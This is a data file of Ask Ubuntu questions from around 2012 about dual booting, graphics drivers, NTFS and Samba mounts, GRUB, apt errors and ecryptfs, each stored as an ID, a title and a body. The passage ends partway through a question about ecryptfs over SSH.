165403	ubuntu and windows dual booting problem	today i 'm dual boot my computer , first i 'm install windows 7 , after i 'm install ubuntu 12.04 . install completed , i 'm login to ubuntu , after few minute , i 'm restart computer and trying to login to windows 7 , but windows startup damaged , i can see windows welcome screen , after my computer restart , i 'm trying to repair windows 7 , but it 's ca n't do , how to fix this problem , plz help me
165405	volume control slider is n't working on sony vaio vgn cs170f	i have just installed ubuntu 12.04 , i 'm taking the big step , the problem is that i am new with linux systems and i am really having a hard time getting it work with all the options of my vaio machine . my problem here is , the volume control slider does n't work . this is kind of touch pad control that sony vaio has in some models . this is how it should work , if you touch/slide it to the right it , turns up the volume , if you touch/slide it left , it turns it down and if you touch the center , it mutes the volume . i read a lot of posts and tried a couple of things but finally i did this : i ran 'xev ' in the terminal and tried the touch/sliding keys but it did n't give me anything back , not a single line of information . what does this means ? and how can i solve this ? i would really appreciate the help of anyone in this problem its a sony vaio vgn cs170f running on ubuntu 12.04 lts .
165408	why the need for sudo when i have only one account on machine ?	i am bit confused about the need for sudo when i have a single user account set up on my machine . at install time i tried to call the name of my account 'root ' which i was not allowed to do . so i used another name , but i still do n't understand why certain actions are blocked and why password verification is needed on updates etc . i can understand this if there are multiple accounts on a machine and some users are set up without certain access privileges but on a single account what is the need for this ? it seems pointless that i can login not as root but perform actions that require root privilege just by entering my password . if all users can do this , what is the distinction between root access and other users access ? ? ? am i missing something here ?
165414	should i install 64-bit ubuntu on my lenovo ideapad y510 laptop ?	i have a lenovo ideapad y510 and i have ubuntu 12.04 32 bit installed on it . i think my machine does support 64bit os . currently i have 1gb ram and i am planning to upgrade it to 3-4 gb . after upgrading ram can i install 64bit ubuntu on my machine ( for better performance as 64bit performs better than 32bit ) ? if yes then what this link is talking about ram usage . i did n't get it all .
165415	why is this command that is in my path not being found ?	i am trying to run a command from within my mythtv interface on my mythbuntu computer . it wo n't run , and i found this error in my mythbackend.log : jul 19 15:55:47 mythbuntu mythbackend [ 1863 ] : w systemevent mythsystemevent.cpp:55 ( run ) mythsystemeventhandler : command '/bin/sh /home/mythbuntu/buttons/powerbutton.sh ' returned 127 i looked up what returned 127 means on google , and it seems to mean simply `` command not found '' . but , /bin is on my path ... $ echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /home/mythbuntu/buttons : /home/mythbuntu ... and sh is definitely in there : $ ls /bin/sh /bin/sh so why is this command not being found ?
165416	blank screen when trying to install from usb	i have a laptop dell inspiron 1545 with windows vista home basic . i 'm trying to install ubuntu alongside vista for the first time . first , i freed about 50gb from the hard drive to use with ubuntu . then , i downloaded the file ubuntu-12.04-desktop-i386.iso , and universal-usb-installer-1.9.0.4 . i used the universal installer to prepare my 4gb hp pendrive to boot and install ubuntu . what i see inside the pendrive is this within a fat32 filesystem : i did this all from an user account that is not the admin account . i do n't think this should be relevant but mention it just in case . finally , i restarted the computer , hit f12 and choose boot from usb drive . next , i saw was a black screen with a this sign `` _ '' on the top left corner and the led on the pendrive looked active . i waited for about 15 minutes and it all remained the same . not even an error message . i made all the downloading , etc . again from scratch and got the same results . i followed the instructions from https : //help.ubuntu.com/community/howtomd5sum for windows , installed winmd5sum and made the comparison between the hashes on the md5sum file on the pendrive and the one that corresponds to ubuntu-12.04-desktop-i386.iso but they did not match . any help please ?
165418	mount fails and do n't timeout	i 've a script that runs every 30m and check if /mnt/controlurg is mounted . if not , it tries to mount it and get some files from it ( it 's a windows drive ) . before 12.04 i did n't had problems but now when the script ca n't mount ( for any reason ) the remote drive the mount command do n't end and keeps as a background process . and even worst , a new zombie background mount process is created every 30m and the cpu load average is getting high ( now is 44 % ! ! ) . checking for running processes i get multiple entries like that : root 29458 29420 0 08:35 ? 00:00:00 mount /mnt/controlurg root 29459 29458 0 08:35 ? 00:00:00 /sbin/mount.cifs //controlurg/c $ /mnt/controlurg -o rw , noauto , user=root , passwd=glesbolan , utf8 how can i kill that processes ? `` kill -9 29459 '' does n't work . why these processes do n't timeout ? how can i kill this failed mounts automatically ? the interesting fragment of /opt/scripts/sftpcont.shl : cat $ script/computers.dat | while read line do echo `date `` + % y/ % m/ % d % h : % m : % s '' ` `` : copying to $ { line } with samba '' isalive=`ping -q -c1 $ line| grep `` 1 received '' |wc -l` if [ $ isalive ! = `` 0 '' ] then mount /mnt/ $ line rm /mnt/ $ linea/contingenciasap/* cp $ script/fitxers/sapfitcrip.zip /mnt/ $ line/contingenciasap umount /mnt/ $ line fi done thx
165425	will ubuntu allow me to play games like i do in windows ?	i was wondering if ubuntu would let me play games like a windows7 computer would . ie : team fortress 2 , minecraft , etc
165426	how do i configure two nics and two gateway ?	i have a ibm server x3200 m3 loaded with ubuntu 10.04 lts . my problem is my network i have a 2 different gateways : vpn static and the other one is dsl dynamic . the internet runs normally when there is only one eth running but when i run two eth at same time the only eth that is working is only eth0 ? how can i make run the two eth run at the same time without any conflict . here is my route output : kernel ip routing table destination gateway genmask flags mss window irtt iface 200.0.30.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 10.42.43.0 0.0.0.0 255.255.255.0 u 0 0 0 usb0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 eth1 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0
165435	nvidia drivers with geforce 680m problem	i have a new alienware m17x which i have installed 64-bit ubuntu 12.10 ( dual boot ) . i have tried various ways to install the nvidia drivers for the geforce gtx 680m ( which they claim they are compatible with ) : from ubuntu software centre ( though additional drivers fails to detect the card . ) using sudo apt-get install nvidia-current downloading the drivers from nvidia and manually installing them ( ctrl + alt + f6 , sudo service lightdm stop , sudo ./nvidia* , sudo reboot ) ( each with a clean install of ubuntu ) but in all cases , when i reboot after installing nvidia-setings claims that i am not using the driver and should sudo nvidia-xconfig from the terminal , which i do but this has no effect and i am stuck in crappy resolution until i rm /etc/x11/xorg.conf and reboot . the xorg.conf that nvidia-xconfig generates is : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection
165439	why are no updates shown for ubuntu 10.10 any more ?	i have n't updated my server ( 10.10 ) for quite a while . i updated package information with sudo apt-get update and then ran sudo apt-get upgrade as usual , which resulted in : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . what could possibly be wrong ?
165443	why kde can not change brightness , while unity can ? macbook air 4,2	i installed ubuntu and kde too on my macbook air 4,2 , but i realised i can not change brightness in kde . in unity , it works without problem . other keyboard keys works properly , sound , play , etc. , but i can not change brightness in kde . i tried kde4.8.4 and kde4.9 beta . thx
165447	problem after installing ubuntu	after installing ubuntu ( wubi ) , i selected reboot now . but after rebooting all i could see was a black screen where no commands were worked when inputted . i forcefully shutdown my laptop , and tried again . selected ubuntu from grub menu . it showed me the ubuntu loading screen then suddenly the black screen showed up without any error message . here too no commands work when inputted . please help ! what to do ?
165448	how to block the desktop background from being changed ?	i 'm trying to lock the desktop background ( so , that it can not be changed by others ) but can not find the way , i got it in 10.04 with `` gconf-editor '' , but now i can not do this in 12.04
165452	how do i check if the graphic drivers are installed correclty	i have followed the following link : - http : //www.upubuntu.com/2012/03/how-to-install-ati-amd-catalyst-122.html to install the amd graphic drivers on my hp laptop . just wanted to confirm if they are installed correctly . thanks ankit
165455	do i need to update my gpu drivers ?	i have the following system running ubuntu 12.04 with wine 5.8 : amd phenom i x4 2.8 ghz xfx gts 250 1gb 3gb ddr 2 ram i have tried the 2 drivers in the additional drivers program and both have the same result ( im currently using the post release ) . im getting about 20-30 fps in all source games under wine . garrys mod , counter strike source and both left 4 dead and left 4 dead 2 . anyone know whats going on ? i have ran all those games just fine on even weaker systems . i have tried turning off dual core rendering and v sync isnt enabled . thanks ! ps : i have downloaded all the updates for ubuntu and still nothing..
165459	gpt not mounting using `` normal '' gpt mounting techniques 12.04	i 've got two 2tb drivess : one mbr and the other gpt . sudo blckid /dev/sdb1 returns a blank . gdisk shows : partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . warning ! secondary partition table overlaps the last partition by 1970 blocks ! you will need to delete this partition or resize it in another utility . disk /dev/sdb : 3907027055 sectors , 1.8 tib logical sector size : 512 bytes disk identifier ( guid ) : 38a1113d-b5e9-4b69-abff-acb27afb3ddd partition table holds up to 128 entries first usable sector is 34 , last usable sector is 3907027021 partitions will be aligned on 8-sector boundaries total free space is 2014 sectors ( 1007.0 kib ) number start ( sector ) end ( sector ) size code name 1 34 262177 128.0 mib 0c01 microsoft reserved part 2 264192 3907028991 1.8 tib 0700 basic data partition mounting via fstab or -t gives same error when using ntfs or ntfs-3g '' ntfs signature is missing '' gparted says one partition is overwriting another , yet windows shows no errors at all . the drive is also mounted easily via macos ( triple boot )
165461	is it possible to change a laptop 's screen-dimming capabilities ?	my laptop is able to dim it 's screen automatically until it is turned off by ubuntu to save power , currently my dim screen button does n't let me turn off my screen completely , my questions are : is it possible to configure the 'dim screen ' button on a keyboard to dim the screen until it turns off or is this limited by hardware ? ( i do n't think that it would be limited because it can turn itself off automatically with my operating system , so why not through a key-press ) if it is possible has someone done it or has someone got an idea of how to do it ? and could they please explain it below ? if it comes in handy here 's some potentially useful laptop information : model : hp pavillion dv6000 graphics card : intel corporation mobile 945gm/gms memory : 2gb ram os currently installed : ubuntu 12.04 single-boot edit : as suggested by the user cumulus007 below it might be hard-coded into my hardware and not modifiable , if anyone could confirm this or find a justification for the opposite i 'd be very grateful .
165464	are there any tweaks for fixing the appearance of eclipse juno on ubuntu ?	as we have previously established ; - ) running eclipse on ubuntu is a bit disappointing on the ui side . things are even worse now that juno is out . are there any tweaks specific to gtk3 and juno that help make things better ? the new ui maybe needs some getting used to , but i 'm not convinced . padding got much worse with all the extra ( useless ? ) space between panes . the gradient on the toolbar looks ugly , the quick search looks like it needs some more polish , the buttons to switch perspectives maybe would look nicer without the quick search bar , tabs are waaay to big . not sure the color scheme has been fixed since i 'm running a modified theme for the sake of old 3.7 ( the infamous white on black tooltips )
165465	is there a way to autorun-on-disconnect a usb external drive ( u10.04 ) ?	i have a small usb hd i 've bought for doing daily backups , which has an encfs system on it . i 've got an autorun script in the root that does a couple of things including mounting the enc-fs and that part works fine . however if i forget to fusermount -u the enc-fs -before ejecting it , there is no warning about anything and the usb dismounts , leaving the encfs part apparently still mounted . of course it is n't really , and attempting to access with nautilus say , causes the machine to `` behave badly '' . there 's also the risk of lost files i suppose . for some reason the systems does n't seem to detect the drive is still active as it normally does , in this scenario . anyway my question is , is it possible to set up the equivalent of an autorun-on-dismount that runs when the usb eject occurs ? thanks
165466	installing ubuntu server , the installer wo n't boot	i downloaded the iso file of ubuntu server 12.04 ( both 64 and 32 bit ) and i burned the image to a blank dvd but the installer is not booting ( even when i choose dvd-rom as the first boot device ) . my motherboard is asus and my os is ubuntu desktop . also there is no autorun and start.exe inside the image that i downloaded . these are the files inside the .iso i downloaded :
165468	slow write speeds to ntfs	when writing to my ntfs partition i am getting very low speeds ( when reading however i 'm getting my maximum speeds ) : 589824 3 % 60.20kb/s 0:04:06 this example is using rsync -- progress [ file ] [ destination ] where i am making a copy of the file in the same directory . i am mounting my ntfs partition using fstab : /dev/sda6 /mnt/data ntfs-3guid=1000 , gid=11000 , umask=0022 , sync , auto , nosuid , rw , nouser 0 0 i am not sure if this is relevant but i was recently looking at the power tweaking tips provided on the ubuntu wiki and i believe that these situations may correlate . grub conf : grub_background=/boot/grub/gbackground.jpg grub_savedefault=true grub_default=0 the power tweak that i believe is causing the problem is the alpm . note : my write speeds to my ntfs patition were absolutely fine until about yesterday when i started fiddling with the power tweak ( s ) i am using one drive with multiple partitions , so it can not be a hardware error , this is also because my dual boot in windows can access the drive at normal speeds .
165471	ntop web interface ?	ntop is a network monitor . it has a web interface for viewing statistics . i installed it via sudo apt-get install ntop on ubuntu 2012.04 , the daemon got started at the end of the install , without me doing anything special . question : how to access the web interface ? http : //localhost:4242 says unable to connect . i tried stopping the daemon and launching it in various ways : sudo ntop -p /etc/ntop -w4242 -d sudo ntop -p /var/lib/ntop/ -w4242 -d but still unable to connect .
165476	how to open password protected excel file in ubuntu 12.04 ?	previously i was using dual boot ( windows 7 and ubuntu 12.04 ) . at that time i created some excel files with password protection . now i am using only ubuntu 12.04 and not windows . ii want to open those files in ubuntu . how can i do that ?
165478	game 'five or more ' simply crashes without opening in ubuntu 12.04	i have a fresh installation of ubuntu 12.04 and my system is promptly updated . i have installed the game five or more ( earlier called glines ) through software center . the game crashed silently without opening and without any report . i uninstalled it and then installed the entire gnome-games suite through synaptic . five or more still does not open . i notice also that the gnome game 'swell foop ' is reduced in size and does not have the resize window option . can some one help ?
165486	ubuntu 12.04 hangs after replugging zte modem	i have seen a solution to a similar problem : ubuntu hangs after replugging the modem but what is the solution for a zte modem ? i do n't think it is the same as that of bcm_wimax . help please .
165491	restore a configured setup	i have several ubuntu systems that are used for hands on network classes . each system includes some installed packages , some scripts and a few configuration changes . problem is , i need a clean setup for each new meeting . until now i used live cd , but it 's not good enough for me . clonezilla and such is out of the question , because i do n't want to re-install 8 pcs every week . any other suggestions ?
165495	fix 'no-sound ' issue for game family-farm	i have played the family-farm demo game for few days and then i bought the game through the ubuntu software center .
165499	debuild does not recognise some files	i have submitted an app for the ubuntu app showdown and had a response with some code to merge . the changes were all in the /debian folder which automatically gets updated when i -run quickly submitubuntu . this means that i have to update my ppa manually , so based on the advice of this question i ran debuild -s part of the output is the following : warning : the following files are not recognized by distutilsextra.auto : help/c/figures/icon.png help/c/index.page help/c/preferences.page help/c/topic1.page po/tripplanner.pot tripplanner.desktop.in what does this mean ? does this mean that these files wo n't be included if i upload the changes file to my ppa ? or is there a way that i can update quickly to use the 'correct ' files in the /debian folder ?
165500	12.04 reboots rather than shutting down	i have a ruvo with a fresh installation of 12.04 . when i try and shutdown the computer reboots . until i upgraded ( by doing a fresh install ) i ran it with ubuntu 10.04 and i did n't have this issue . i have tried sudo shutdown -h now sudo shutdown -p now sudo init 0 sudo poweroff all of these cause a reboot . i have added acpi=norq to my grub file as suggested by someone in the first post below . this is being used as a mythtv frontend and i would like the power button to shut it down . i have modified the button to perform a shutdown -h now , but this too causes a reboot . i have studied the posts below and tried some of these ideas , but with no luck so far . why do i get a reboot instead of a shutdown ? ubuntu 12.04 not shutting down properly stuck on reboot and shutdown shutdown does not power off computer
165501	how do i sort a wordlist by string length ?	there is a wordlist look like this ; 123 b 1 4rr f k3j3 gg then i needed to sort these words by string length ( does n't matter which start with numeric or string both are okay ) the output should be this : b 1 f gg 123 4rr 4rr is there a sort command that allows me to do this ?
165507	how to change maximum number of cores ?	it says in how many maximum cpus does ubuntu support by default ? that there is a maximum number of 8 cores supported by default in ubuntu 12.04 desktop/server 32-bit . what is the way to increase the maximum number of cores from the default of 8 to a higher value , like 12 ? the reason i ask is because i have just built a machine with 6 hyper threading cores . there were issues installing the 64-bit version of the software from a cd ( it `` panicked '' and crashed several times ) . the 32-bit installed with no problem , but i only see 8 of the 12 cores . the bios is fine . if i turn hyper-threading off and reboot , i see 6 cores as expected . i am nervous to try and compile a kernal , i am still new to all of this . is there a config setting somewhere that i should change ?
165512	sendmail account for sending e-mail on ubuntu	i 've got a clean installation of ubuntu with webmin running sendmail . i 've got a domain mail.my-domain.com pointing at that server . i want to make a smtp account for sending out e-mails , such as account-name @ my-domain.com . how do i do this ? for the record , i 've tried a lot of google searching etc . but no tutorial , documentation etc . that i could find showed a simple step-by-step to this simple setup : (
165514	paste option is greyed out in context menu	on right click in file explorer ( nautilus ) this happens ( options are 'create new folder ' , 'create new document ' , etc ) . it does not happen on applications such as firefox , writer , etc . i know this happened after i made i clean install to 12.04 but i do not know if it happened since the install or after . even though the option is greyed out i can still paste if i click it , or ctrl+v . any idea ?
165515	.bashrc not responding	i 'm having an odd problem with the .bashrc file . i 've added the following line so git could show me the current branch on prompt ( i saw this tip here ) # show branch in status line ps1= ' [ \w $ ( __git_ps1 `` ( % s ) '' ) ] \ $ ' export prompt_command='echo -ne `` \033 ] 0 ; $ { pwd/ # $ home/~ } \007 '' ' but it does n't work . also , i ca n't add my own aliases , if i add some to .bashrc_aliases it does n't seem to read them .
165516	how can i build vim with a gui without gtk ?	i 've recently started playing around with pygobject . however , gvim or vim 's python-complete feature crashes , because , as i understand , you can not mix gtk2 and gtk3 libraries in the same process . therefore , i 'd like to know how to install vim with a non-gtk toolkit . ( sudo apt-get build-dep vim will try to install gtk2 libs . ) please note that i 'm very happy with vim , and i do n't want to switch editors . i 've found instructions to build vim with qt , however python-complete is not working properly .
165528	help asap i want to install ubuntu	i want to install ubuntu for my pc but i dont want to lose my windows . i want to install both os on my pc . how can i do it and how can i download the os ? please reply . thanks .
165531	how can i get gcc to find certain libraries ?	i am trying to compile a program ( gcc , using some functions from intel 's ipp library ) . it is my first use of ipp , so i think i might be doing some not very clever mistake . anyhow : g++ -o inteltrial inteltrial.cpp -i/home/me/desktop/work/p1/geqw4/vi3/out/sp/ccode/eigen -i/opt/intel/composerxe/ipp/include -l/opt/intel/composerxe/ipp/lib/intel64/ -libipps_l.a -libipps_t.a gives : /usr/bin/ld : can not find -libipps_l.a /usr/bin/ld : can not find -libipps_t.a now , -libipps_l.a -libipps_t.a are in /opt/intel/ipp/lib/intel64 how to point gccto the right location ? edit : this post seems to be related , but i ca n't find on the internet how to add a line to ld.so.conf ... .
165533	transferring from usb to ntfs hard drive is really slow	i have a second hard drive that i 've installed on my system , and copying files from the usb to the hard drive is extremely slow ( about 70kb/sec ) . here is my /etc/fstab entry : /dev/sdb1 /media/storage ntfs uid=rhys , gid=users , auto , user , exec , rw , sync 0 0 am i doing something wrong here ?
165537	can i have different desktop folders in each workspace ?	is there any way that i can have different desktop folders in each workspace ? e.g . workspace1 has a desktop with a folder named test1 , while the desktop folder in workspace2 has a different folder named randomfolder . right now if i change something in one workspace desktop all the workspaces will change .
165544	why do guest additions need kernel headers in virtualbox 4.04. ?	i 'm trying to install the guest additions in virtualbox 4.04.on ubuntu 11.10 i have this error : the headers for the current running kernel were not found . if the module compilation fails then this could be the reason . note that i have already installed the headers but still get this error . do you have you an ideas please ?
165545	maas install 64-bit client nodes does n't work	i have installed a maas node that will act as the parent and i am trying to add additional nodes via the pxe boot . the nodes boot fine and get an image from the maas server but they only install the 32-bit version . they are 64-bit machines and i would really like them to use the 64-bit version of ubuntu precise . the maas server has the precise_x86_64 image according to the maas-import-isos and it is an option when its doing a network boot . however if i do the maas-precise-x86_64 the node does n't register with the maas parent node . it seems like it just installs a clean version of ubuntu 12.04 64-bit . what i want to know is if there is a setting i have to change or something to get it to just boot over network and use the 64 bit instead of the 32-bit version ? i have checked everywhere for this answer and could n't find anyone even referring to the other options at network boot . everyone just wants you to wait for the timeout but for me that means it 'll install the i386 version instead of the x86_64 . has anyone experienced this and knows how to make it install with the 64-bit version instead of the 32-bit one ?
165549	3dsp bluew2310u bluetooth/wireless combo has no driver support in 12.04 lts	i am running ubuntu 12.04 lts ( kernel 3.2.9-26-generic ) on a touchpad with a 3dsp bluew2310u bluetooth/wireless combo device internally installed . it does not work because the release does not include the drivers . searching the web i have discovered that the manufacturer 's web site is `` off the air '' so it does not look like i can get the driver source from them . i have also discovered that ubuntu version 10.04 ( kernel 2.6.32 ) did have support . is there some way to get support added back into the 12.04 release and if so , how ? thanks !
165551	quickly app web application	after i submitted my app for the showdown i would like to know whether it would be possible to make a webapp out of it . is it possible with a desktop app created with quickly/glade/python or is it easier to do re-implement it ? i 'm just curious whether i could reuse my code ... thanks
165553	keyboard cursor loses focus when i 'm typing	when i 'm typing a text in openoffice on ubuntu 11.10/12.04 using the keyboard of dell inspirion 1525 , the cursor loses focus and i start to typing in another place on screen .
165556	upgrade-grub and boot-repair fails . unable to boot one of my linux systems , is there a way around ?	i have three linux and two windows systems on one computer . after updating the kernel on one ( archlinux ) and running update-grub on the default ( bios ) boot disk ( xubuntu 12.04 ) , the boot menu does not report the archlinux system . after running boot-repair , i can not boot the archlinux system by selecting it as the boot disk in bios because it now uses the boot configuration on the xubuntu system instead of booting directly from its disk . i really need to be able to boot the archlinux system , how can i do this ? note : bugs filed and notices made on this .
165559	ubuntu 12.04 cd will not boot up	i have a small problem . fujitsu-siemens laptop had 12.04 . my kid somehow managed to format the hard drive . now i 'm trying to install 12.04 . burnt 2 cd , and it will not boot . all i get is a flashing cursor upper left of the screen . well before you say do an md5sum , it has been done . as a matter of fact both cd work ok on other machines , and on the same machine about 3 weeks ago . if i try xp it works . any ideas . specs : amilo pro v8010 centrino 1.73 ghz 1.5 gb ram 60 gb sata hard drive ( ahci enabled ) i have tried all the things that were suggested , and nothing works . i also tried ubuntu 11.10 , and that did n't work either . i just tried windows xp on the machine , and it installed fine . i really do n't want anything to do with w. so how can i fix this , so i can have ubuntu back ?
165560	intermittent buzz / hdmi audio	i have a htpc with a asus p7h57d-v evo motherboard and an i5 processor/gpu . i am using hdmi audio out to a panasonic tv . htpc is running ubuntu 12.04 lts with mythtv 0.25 . in most applications i get an intermittent , metallic buzz noise every 10 to 12 seconds . the noise lasts for a second or less each occurrence . the noise is audible through any application except mythtv . as a result , i 'm confident it is n't a physical problem or any particular media file ( the same mp3 will sound fine when played with mythtv , but will buzz with rhythmbox ) . i 've spent a lot of time playing around with my .asoundrc file ( some reading suggested a resampling issue ) and a few snd-hda-intel models . after having spent hours on this issue , i am hoping someone who knows more about alsa and hdmi can tell me if i 'm at least on the right path or if i should be looking somewhere else for the resolution . honestly , i 'd be happy if i could just get hulu desktop to stop making the noise ( in addition to mythtv ) . for instance , since i launch hulu desktop from mythtv , can it somehow inherit mythtv 's audio settings ? thanks for your time !
165562	add apps to top panel in ubuntu 12.04	is there any way to add any app i wish to the top panel in ubuntu 12.04 ? e.g , i have dropbox , mail , wireless and sound icons there . i 'd like to add for example terminal , google earth or any app there . also , what 's the shortcut for the task manager , that shows the processes and some specifications of the computer ?
165567	is there an app to display partition identifers ?	i 'd like to know if an app exists that list all partitions , their filesystem type , and their possible identifiers . this could help users in configuring their bootloaders . for example : identifier grub identifier filesystem type size /dev/sda1 ( hd0,2 ) ext4 37gb /dev/sda4 ( hd0,5 ) ntfs 20gb is there an app with functionality similar to this that anyone knows of ?
165573	login redirects back to login screen	i am using ubuntu 11.10 which was working fine till today . if i try to login using one of my user accounts it directs me back to the login screen , which is followed by a black screen . i am sure the password i enter is correct because if the password is wrong it prompts `` invalid password '' . on the other hand i am able to login using a root or guest account .
165574	gnu grub purple screen	i installed ubuntu 12.04 about two weeks ago and everything booted fine and dandy . about four days ago i booted my laptop and instead of the usual it came up with this : http : //imageshack.us/photo/my-images/834/img0076sd.jpg/ i installed ubuntu after windows 8 caused havoc with my machine ( no physical damage ) and as such i installed ubuntu on it 's own ( no wubi ) . selecting any of the options seems to do nothing ( the first option just leaves me with a blinking cursor ) . i 'm not someone who 's competent with coding so any help would be appreciated : )
165577	how do i reserve bandwidth ?	in windows there is a registry entry called reserve bandwidth . with that system was reserved some bandwidth from my internet connection so that when i am downloading all other connected application can run with minimum internet support . like reserve bandwidth help to keep other application ( all kind of messenger ) on-line when i was downloading . but in ubuntu my connection speed is good enough but problem arise when i am downloading a file , all my messenger gets off-line status . can any one tell how can i fix such problem ? or why this is happening ?
165581	how do i share a folder on samba ?	i want to share my home folder with my windows machine , but i have no idea how to share the folder . i ca n't find any up-to-date guides on google , so how can i share my home directory ?
165584	thunderbird : enable drag and drop to move email into folder	i recently did a fresh install to upgrade from 11.10 to 12.04 . i have thunderbird 14.0 thunderbird is n't letting me move an email to a folder by dragging it . how do i turn this [ back ] on ? or is this a bug ? one note ( that may be important ) : i saved my .thunderbird folder from my 11.10 install and moved it over the default folder ( so as to not need to set up everything again ) .
165587	how can i decrease key repetition time in gnome-terminal like konsole in kde ?	i liked the feature or more quicker key repetition time in konsole ( kde 's terminal ) . the feature is actually , if you write a long line and wanted to delete it by pressing and holding the backspace key , the line start deleting quickly . but , in gnome-terminal ( default ubuntu 's default terminal ) it required more time . you have to hold the backspace button more time than in konsole . my question is : how can i reduce this time in gnome-terminal ? or how can i make gnome-terminal to trigger key repetition quickly ? note : i am asking it not only for deleting line , but also for going to specific position in line .
165590	gmusicbrowser alternative ?	i have been tinkering with xubuntu recently and i found the player , gmusicbrowser , to be lacking in some aspects . i am looking for a lightweight music player that can handle web radio stations , podcasts , use gtk so it blends well with xfce and optionally handle video in podcasts . any suggestions ? thanks in advance .
165592	ubuntu 12.04 does n't know there 's a battery	i 've just installed ubuntu 12.04 on my acer aspire 5553 . it 's the first time i 've used linux for more than 4 years so i do n't really know what i 'm doing . the installation went almost perfectly ; internet connections and graphics were all configured fine ( which is more than i can say for the windows 7 i 've just installed on a dual boot ) . however , when i unplug the power supply , there is no battery indicator displayed . in the power settings , there is only one column ; i 've seen screenshots indicating that i should see two columns , one for `` on battery power '' and one for `` when plugged in '' . there is also no field `` when power is critically low '' . i can use the laptop on battery power , but it just keeps running on full power until it suddenly switches off . it seems like the os does n't `` know '' it 's on a laptop . i installed windows 7 yesterday on dual boot and that configured the power supply perfectly ( unlike most of the other hardware ) . i reinstalled 12.04 this morning and the problem persists . the problem is there in both unity and gnome .
165600	how to add unused partition of the first disk to /home in the second disk	i have two ssd disks , disk b is devoted to /home , and disk a is the filesystem and is 90 % empty . so i made on disk a a partition /dev/sda3 with 80 % of the free space . now i am wondering what is the best way to somehow add the newly created partition to my /home which is located at /dev/sdb1 ?
165604	getting `` size mismatch '' when using apt-get on multiple packages	i 'm having trouble getting several packages downloaded using apt-get . so far , i 've run into this with 'opencv ' and 'gstreamer ' . with opencv , it will fetch a number of files then return with the error below . i 've tried several different mirrors and they all error on the same file ( s ) . do you want to continue [ y/n ] ? y get:1 http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ precise/universe libopencvvideo2.3 i386 2.3.1-7 [ 106 kb ] get:2 http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ precise/universe libopencv-video-dev i386 2.3.1-7 [ 129 kb ] fetched 2,225 b in 0s ( 11.8 kb/s ) failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/universe/o/opencv/libopencv-video2.3_2.3.1-7_i386.deb size mismatch failed to fetch http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/pool/universe/o/opencv/libopencv-video-dev_2.3.1-7_i386.deb size mismatch e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i ran 'apt-cache show libopencv-video* ' and got : package : libopencv-video2.3 priority : optional section : universe/libs installed-size : 277 maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > original-maintainer : debian science team < debian-science-maintainers @ lists.alioth.debian.org > architecture : i386 source : opencv version : 2.3.1-7 depends : libc6 ( > = 2.4 ) , libgcc1 ( > = 1:4.1.1 ) , libopencv-core2.3 , libopencv-imgproc2.3 ( = 2.3.1-7 ) , libstdc++6 ( > = 4.1.1 ) filename : pool/universe/o/opencv/libopencv-video2.3_2.3.1-7_i386.deb size : 105756 md5sum : b38c0f11f3856d62168b730522a9691b sha1 : d45cd609ea497ae72858e0f5914134e124261f22 sha256 : 85e72311ede84efbdd17781cdb04f79818a28968c63f407df6c56efe7da5525e description-en : computer vision video analysis library when i compare the filesize reported ( 105756 ) it does not match the size of the 'deb ' package when i pull it down with wget . any suggestions as to solving this problem short of using wget on each of the failed files and installing them manually ?
165606	how to run the chromeplus browser in ubuntu ?	i 'm new to linux ubuntu . i was using chromeplus in windows 7 , it also has a linux version . so i downloaded it . it 's a chromeplus*.tar.gz file . i use the command tar xvzf chromeplus*.tar.gz to unzip the file and got a bunch of files . i really have no idea about how to run the chrome browser . is it installed already or i need more steps ? there 's no ./configure and read-me file .
165608	why is ecryptfs only mounting private home directory over ssh ?	the title says it all ; my 12.04 server box will only decrypt and mount my home directory if i log in over ssh . last night i needed some data off my server but i had left my laptop with my private keys at work . i logged in directly at the box and to my surprise my home directory was empty . reading up on the subject , i learned about how ecryptfs works and its directory structure . sure enough , i found the hidden .ecryptfs and .private directories in my home folder . the .private folder appeared to contain the correct number of files and directories , but with their names obfuscated by encryption obviously . however , no matter what i tried i could n't mount the directory . i tried : manually invoking 'ecryptfs-mount-private' use 'sudo ' a few times to make sure password has been supplied add 'ecryptfs-mount-private ' to the end of .profile tried 'ecryptfs-recover-private ' , which found my encrypted home but when mounted as ro at /tmp was empty after a few hours i figured that my files had somehow been corrupted and lost . nothing super important stored there , so it was n't a huge loss , but still irritating . this morning i get to work and on a hunch log in over ssh to my server at home . sure enough , my files are there and intact . in other words , ecryptfs is only mounting my encrypted home over ssh . this seems completely opposite to what i 've found questions about ; most people log in over ssh and then wonder why their files are n't there . i have n't done any crazy configuration , other than the necessary storage of 'authorized_keys ' at /etc/ssh/ [ user ] so sshd can read it . this box was originally set up on 11.10 and during installation i elected for encrypted home directories . the recent update to 12.04 appeared to go smoothly and i did n't notice any problems . sshd is currently set up with : ssh protocol 2 